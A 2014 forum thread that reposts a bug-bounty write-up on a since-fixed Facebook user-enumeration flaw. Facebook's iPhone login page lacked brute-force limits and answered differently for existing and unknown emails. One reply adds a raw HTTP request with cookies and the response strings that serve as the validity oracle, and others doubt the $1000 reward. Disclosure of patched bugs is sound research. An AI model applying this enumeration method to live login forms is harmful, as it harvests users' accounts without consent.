florin_darck Posted February 17, 2014 Report Posted February 17, 2014 Facebook User Enumeration Vulnerability By Bypassing Brute Force Protection==============================Bug Status - Reported On 3-5-2013 Fixed On - 12-6-2013Reward - $1000============================= Before next if you dont know about User Enumeration Vulnerability then see belowUser Enumeration is a Technique or Vulnerability which can allow an attacker to enumerate all email , user name or sensitive information about any user which is already exist in that target vulnerable web applicationSo lets move the our testing partif i said about me then i didnt tried for XSS , CSRF or any other common bug .i always try to find some logical ot unique bugso while searching this type of bugs in iphone.facebook.com this is special version for iphone users where they can browse fb on their iphoneNow here is the interesting part cameYou all are know that every web application have his forgot your password and registration formwhere user can reset their password and create a new account.Lets think that what an attacker can do with this two forms..hmmmmmmmmmmmmmmmmmmm Yaa he can check that which email address are already exist in that web application by performing the Mass Brute Force Attack. So i tried to perform this attack on iphone.facebook.com and m.facebook.com forgot your password but all know that facebook have his internal brute force detection mechanism so no once can easily perform this type of attackas result of this attack i got that after 10 attempts facebook blocking my request so i was unable to perform this attack here.I tried to bypass it but didnt got anything there Then finally i got a flaw of improper request handling on iphone.facebook.com login panel for users.http://1.bp.blogspot.com/-bNNKQenh-2Y/UqU9yFIr7aI/AAAAAAAAAoQ/JQTiOHU6syo/s1600/POC+1.jpg Like in normal web application if you enter only email without giving password then web application will give you an error that " Please Enter Email & Password Or You Entered An Invalid Email Or Password "but in iphone.facebook.com there is some mistake in request & response.If i enter only email in login panel without giving password then i got an error that " We didnt recognize your email address"Hmmmmmmmmmmmm Means we can enumerate the of all email address of existing email id but may facebook also can block our request like last time we do.But this time instead of blocking my request he is giving me "Different Response Code For Existing Or Non Existing Email Id"200 For Non Existing & 302 For Existing Emailhttp://4.bp.blogspot.com/-ajYYfaFTV_o/UqL8hjsN0wI/AAAAAAAAAnM/fssvqe4zdn8/s1600/POC+4.jpgPOC But one think is still in mind that how its possible that facebook brute force mechanism is failed to detect my attemptsBecause facebook had forgot to add brute force mechanism on this particular log in page thats why i am able to perform this kind of attack hereNow the bug is fixed Source : Web And Information Security Quote
Maximus Posted February 17, 2014 Report Posted February 17, 2014 Host: iphone.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://iphone.facebook.com/login.php?refsrc=https%3A%2F%2Fiphone.facebook.com%2F&refid=9&e=1348028&email=snoop_sssad%40yahoo.com&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&li=5wgCU1xZ4nhIM-Ad4b_WiSQK&_rdrCookie: datr=rv7lUj4TLFlhAWGlHvS9xvcC; fr=0CX1ISfPWgHY98GtH.AWW21Ok89H0jKJ-AHRjFqvfyWjw.BS5f65.Hr.FMB.AWXndWPa; lu=TA25WbjfGRRCk4ptWyoz70KA; locale=en_US; reg_fb_gate=http%3A%2F%2Fiphone.facebook.com%2F; reg_fb_ref=https%3A%2F%2Fiphone.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fiphone.facebook.com%252F%26refid%3D9%26e%3D1348028%26email%3Dsnoop_sssad%2540yahoo.com%26signup_layout%3Dlayout%257Clower_subdued_button%257C%257Cs_btn%257Cspecial%257C%257Cl_btn%257Cconfirm%257C%257Csignupinstr%257C%257Clogininstr%257C%257Cst%257Ccreate%257C%257Claunched_Jan9%26li%3D5wgCU1xZ4nhIM-Ad4b_WiSQK; m_ts=1392642569; sfiu=AYjAEYnDRFu1ODLJXhzRo2R_qdcLthL7thmlJVinxvzMKied5NqQ8RhEUsWygYC16lJZeuhomQwo5gg8jL9RQVC3Bu9Vz0owCfflGcI3u3xpKUFk8KDugUWdKuaSikjbZFHsTfJBMHdjmrc-rvjWkONIq0Fbfo1vQNNv9lJCgKruqQConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 380post contentlsd=AVrRrtFU&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&version=1&ajax=0&width=0&pxr=0&gps=0&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&email=sdfdg3334f@yahoo.com&pass=&login=Log+InWe didn't recognize your email address. = invalidYour password was incorrect. = validsauAlternatively, we can send you a message with a link you can use to easily login. = valid Quote
awnly3jhc2g Posted February 17, 2014 Report Posted February 17, 2014 Nu cred ca a luat 1000$ pentru asa ceva. Quote
tpad Posted February 17, 2014 Report Posted February 17, 2014 Ce inseamna sa faci din tantar armasar:).. totusi e vorba de Facebook, tine la imagine. Quote